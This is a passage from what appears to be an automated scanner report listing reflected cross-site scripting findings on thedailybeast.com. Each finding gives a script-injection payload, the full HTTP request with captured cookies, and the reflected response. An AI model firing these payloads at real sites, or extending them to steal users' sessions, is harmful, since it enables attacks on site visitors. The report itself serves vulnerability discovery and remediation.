Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet7ad64"><script>alert(1)</script>179a0ffcacf/item/gop-hopefuls-jockey-for-donors/campaign-cash/"/>
...[SNIP]...

1.28. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c802"><script>alert(1)</script>fd72a61c11a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item9c802"><script>alert(1)</script>fd72a61c11a/gop-hopefuls-jockey-for-donors/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item9c802"><script>alert(1)</script>fd72a61c11a/gop-hopefuls-jockey-for-donors/campaign-cash/"/>
...[SNIP]...

1.29. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73151"><script>alert(1)</script>067bf9ef41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/gop-hopefuls-jockey-for-donors73151"><script>alert(1)</script>067bf9ef41a/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors73151"><script>alert(1)</script>067bf9ef41a/campaign-cash/"/>
...[SNIP]...

1.30. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5654"><script>alert(1)</script>0f579b3ce69 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cashf5654"><script>alert(1)</script>0f579b3ce69/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cashf5654"><script>alert(1)</script>0f579b3ce69/"/>
...[SNIP]...

1.31. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42776"><script>alert(1)</script>e020b8c6915 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet42776"><script>alert(1)</script>e020b8c6915/item/house-dems-reach-leadership-agreement/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet42776"><script>alert(1)</script>e020b8c6915/item/house-dems-reach-leadership-agreement/congress/"/>
...[SNIP]...

1.32. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a2d"><script>alert(1)</script>71925b788b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/iteme5a2d"><script>alert(1)</script>71925b788b8/house-dems-reach-leadership-agreement/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/iteme5a2d"><script>alert(1)</script>71925b788b8/house-dems-reach-leadership-agreement/congress/"/>
...[SNIP]...

1.33. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 628cf"><script>alert(1)</script>04f0437aaae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/house-dems-reach-leadership-agreement628cf"><script>alert(1)</script>04f0437aaae/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement628cf"><script>alert(1)</script>04f0437aaae/congress/"/>
...[SNIP]...

1.34. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bd6f"><script>alert(1)</script>8fce6f3c70d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/house-dems-reach-leadership-agreement/congress1bd6f"><script>alert(1)</script>8fce6f3c70d/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress1bd6f"><script>alert(1)</script>8fce6f3c70d/"/>
...[SNIP]...

1.35. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57153"><script>alert(1)</script>90b6a40fa48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet57153"><script>alert(1)</script>90b6a40fa48/item/ngos-letting-haiti-down/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet57153"><script>alert(1)</script>90b6a40fa48/item/ngos-letting-haiti-down/no-relief/"/>
...[SNIP]...

1.36. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed6b"><script>alert(1)</script>b40e7870f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item4ed6b"><script>alert(1)</script>b40e7870f0d/ngos-letting-haiti-down/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item4ed6b"><script>alert(1)</script>b40e7870f0d/ngos-letting-haiti-down/no-relief/"/>
...[SNIP]...

1.37. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 843b4"><script>alert(1)</script>77ab1287e10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/ngos-letting-haiti-down843b4"><script>alert(1)</script>77ab1287e10/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down843b4"><script>alert(1)</script>77ab1287e10/no-relief/"/>
...[SNIP]...

1.38. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d8c6"><script>alert(1)</script>56aff80c14 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/ngos-letting-haiti-down/no-relief5d8c6"><script>alert(1)</script>56aff80c14/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief5d8c6"><script>alert(1)</script>56aff80c14/"/>
...[SNIP]...

1.39. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6cf"><script>alert(1)</script>d4d0120fbab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet1b6cf"><script>alert(1)</script>d4d0120fbab/newsmaker/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet1b6cf"><script>alert(1)</script>d4d0120fbab/newsmaker/innovation/"/>
...[SNIP]...

1.40. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd7"><script>alert(1)</script>ae1f3537ce6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmakerb3cd7"><script>alert(1)</script>ae1f3537ce6/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmakerb3cd7"><script>alert(1)</script>ae1f3537ce6/innovation/"/>
...[SNIP]...

1.41. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe25"><script>alert(1)</script>20de90a0287 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/innovationabe25"><script>alert(1)</script>20de90a0287/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:22 GMT
Content-Length: 12045
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/innovationabe25"><script>alert(1)</script>20de90a0287/"/>
...[SNIP]...

1.42. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd9c"><script>alert(1)</script>52e16d6aac3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet8fd9c"><script>alert(1)</script>52e16d6aac3/newsmaker/politics/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
